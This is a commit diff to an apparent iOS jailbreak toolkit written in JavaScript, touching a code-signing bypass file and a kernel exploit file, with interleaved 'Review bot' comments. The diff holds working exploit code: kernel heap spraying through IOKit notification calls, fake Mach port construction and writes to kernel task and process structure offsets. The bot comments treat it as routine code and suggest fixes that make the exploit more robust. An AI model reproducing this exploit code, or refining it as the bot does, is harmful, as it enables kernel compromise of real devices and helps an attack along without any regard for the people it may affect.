-rw-r--r--src/js/csbypass.js18
-rwxr-xr-xsrc/js/kexp/exploit.js74
2 files changed, 37 insertions, 55 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 3065099..12388a0 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -25,27 +25,23 @@ function memcpy_exec(dst, src, size) {
var width = malloc(4);
var height = malloc(4);
var pitch = malloc(4);
- var pixel_format = malloc(5);
+ var pixel_format = malloc(8);
write_u32(width, PAGE_SIZE / (16 * 4));
write_u32(height, 16);
write_u32(pitch, read_u32(width) * 4);
write_u32(pixel_format, 0x42475241); // ARGB
write_u32(pixel_format + 4, 0x0); // ARGB
printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue"));
- dict = callnarg(CFDictionaryCreateMutable_addr + get_dyld_shc_slide(), 0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
+ dict = CFDictionaryCreateMutable(0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
printf("dict: %p\n", dict);
- var test = callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pitch);
+ var test = CFNumberCreate(0, kCFNumberSInt32Type, pitch);
printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
- call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
- printf("fuck1\n");
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
- printf("fuck2\n");
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
- printf("fuck3\n");
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
- printf("fuck4\n");
+ CFDictionarySetValue(dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
printf("fuck you\n");
printf("%d\n", callnarg(my_IOSurfaceAcceleratorCreate, 0, 0, accel));
}
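Review bot: The wrappers introduced on the `+ dict = CFDictionaryCreateMutable(...)` and `+ var test = CFNumberCreate(...)` lines are not applied consistently: the three new `CFDictionarySetValue(...)` lines still build their CFNumber via `callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width)` (and `height`, `pixel_format`), so the slide arithmetic the wrappers hide survives in the same hunk; `CFNumberCreate(0, kCFNumberSInt32Type, width)` is the matching form. The `// ARGB` comment on `write_u32(pixel_format + 4, 0x0)` is copied from the line above and does not describe a zero write. Since the `malloc(8)` change is what makes that second write in-bounds, a comment on the malloc line such as `// 8 bytes: two u32 writes below` would record why the size changed. The enclosing function starts before the hunk.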
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 419f5c7..e854ba0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -185,13 +185,18 @@ function spray(dict, size, port) {
var ret = 0;
var master = shit_heap(4);
- host_get_io_master(mach_host_self(), master);
- io_service_add_notification_ool(master, "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+ ret = host_get_io_master(mach_host_self(), master);
+ printf("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));
+// scall("printf", "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
+ ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+ printf("yahtzee %d (%s)\n", ret, mach_error_string(ret));
if (ret == KERN_SUCCESS) {
ret = read_u32(err);
}
+ printf("yahtzee2 %d (%s)\n", ret, mach_error_string(ret));
+
return ret;
}
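Review bot: The return value of `host_get_io_master` is now captured and printed but never checked before `read_u32(master)` is handed to `io_service_add_notification_ool`, so a failure there proceeds with whatever the `master` slot holds; a guard after the first printf, `if (ret != KERN_SUCCESS) return ret;`, keeps the function's existing return contract. The commented-out `// scall("printf", ...)` line is dead code and should be deleted rather than kept, and the three `yahtzee` printfs read as temporary debug output. The renderer appears to have dropped blank context lines, so spray's body may extend slightly past what is shown.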
@@ -370,36 +375,6 @@ function mach_ports_lookup_shit() {
// return 0x42603;
}
-function mach_ports_lookup_shit_dealloc() {
- printf("fuck\n");
- var arrz = shit_heap(4);
- printf("fuck\n");
- write_u32(arrz, 0);
- printf("fuck\n");
- var sz = shit_heap(4);;
- printf("fuck\n");
- write_u32(sz, 3);
- printf("fuck\n");
-// var mts = mach_task_self();
- printf("fuck\n");
- calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
- puts("helo");
- printf("mpl success\n");
- scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
- printf("mpl success\n");
-
- for (var i = 0; i < read_u32(sz); i++) {
- if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
- printf("destroying %p\n", read_u32(read_u32(arrz) + (i << 2)));
- mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
- printf("destroyed %p\n", read_u32(read_u32(arrz) + (i << 2)));
- }
- }
-
- return read_u32(read_u32(arrz) + 8);
-// return 0x42603;
-}
-
var kernel_task_addr = 0;
function get_kernel_task() {
var ret = 0;
@@ -469,18 +444,20 @@ again: while (true) {
sched_yield();
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
- spray(big_buf, big_size, dummy);
+ var dummy = shit_heap(4);
+ spray(big_buf, read_u32(big_size), dummy);
}
sched_yield();
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM; i++) {
// for (var i = 0; i < 8; i++) {
+ var dummy = shit_heap(4);
if (i % 4 == 0) {
printf("spray_ports %d\n", i);
}
write_u32(fp + (i << 2), spray_ports(1));
- spray(small_buf, small_size, dummy);
+ spray(small_buf, read_u32(small_size), dummy);
}
sched_yield();
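Review bot: `var dummy = shit_heap(4);` is now declared both immediately before each for loop and again inside it (first and second loop); with function-scoped `var` the inner declaration hoists to the same binding, so the pre-loop allocation is dead and every iteration allocates a fresh buffer the outer line never uses. Either drop the two pre-loop `var dummy = shit_heap(4);` lines or, if one buffer per iteration is intended, say so on the inner line: `// fresh buffer per spray call`. Both loops also re-declare `var i`, which is harmless but adds to the confusion. The enclosing `again: while (true)` block starts and ends outside the hunk.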
@@ -489,15 +466,23 @@ again: while (true) {
release_port_ptrs(read_u32(fp + (i << 2)));
}
+// return;
+
+
+ var arrz = shit_heap(16);
+ write_u32(arrz, 0);
+ write_u32(arrz + 4, 0);
+ write_u32(arrz + 8, 0);
+ write_u32(arrz + 12, 0);
+ var sz = shit_heap(4);
+ write_u32(sz, 3);
+// mach_ports_lookup_shit_dealloc();
+ var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
+ mach_ports_lookup(mach_task_self(), arrz, sz);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ printf("mpl success\n");
- var arrmpt = shit_heap(16);
- write_u32(arrmpt, 0);
- write_u32(arrmpt + 4, 0);
- write_u32(arrmpt + 8, 0);
- write_u32(arrmpt + 12, 0);
- mach_ports_lookup_shit_dealloc();
- var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
- mach_ports_lookup_shit();
+ var fake_port = read_u32(read_u32(arrz) + 8);
printf("%d %s\n", ret__, mach_error_string(ret__));
printf("r3gister done\n");
// while (true) {
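Review bot: `mach_ports_lookup(mach_task_self(), arrz, sz);` discards its return value even though the neighbouring `r3gister` result `ret__` is printed two lines later, and `fake_port` is then read from `read_u32(arrz) + 8` whether or not the lookup succeeded; capturing it the same way, `var ret_lookup = mach_ports_lookup(mach_task_self(), arrz, sz);`, and printing it alongside `ret__` would make the failure visible. The commented-out `// mach_ports_lookup_shit_dealloc();` refers to a function this commit deletes, and the `// return;` plus the two blank lines above it are leftovers; the same applies to the commented-out `// var fake_port = mach_ports_lookup_shit();` in the next hunk, which should be deleted now that `fake_port` is assigned here. The enclosing block begins before the hunk and continues after it.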
@@ -509,7 +494,7 @@ again: while (true) {
/*
* BEGIN JANK FUCKING HACK
*/
- var fake_port = mach_ports_lookup_shit();
+// var fake_port = mach_ports_lookup_shit();
printf("fuck\n");
printf("%x\n", fake_port);
printf("fuck\n");
@@ -519,7 +504,8 @@ again: while (true) {
printf("fuck\n");
write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
- write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+ write_u32(ptr, 0x73707621);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
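Review bot: `write_u32(ptr, 0x73707621);` replaces a computed value with an unexplained literal while keeping the old expression as a comment directly above it. Give the literal a named constant with a comment stating what it represents, or mark it explicitly as provisional, e.g. `// TODO: document 0x73707621 (stands in for the find_kerneltask() computation)`, and delete the `// write_u32(ptr, find_kerneltask() ...)` line rather than leaving commented-out code. The enclosing block starts and ends outside the hunk.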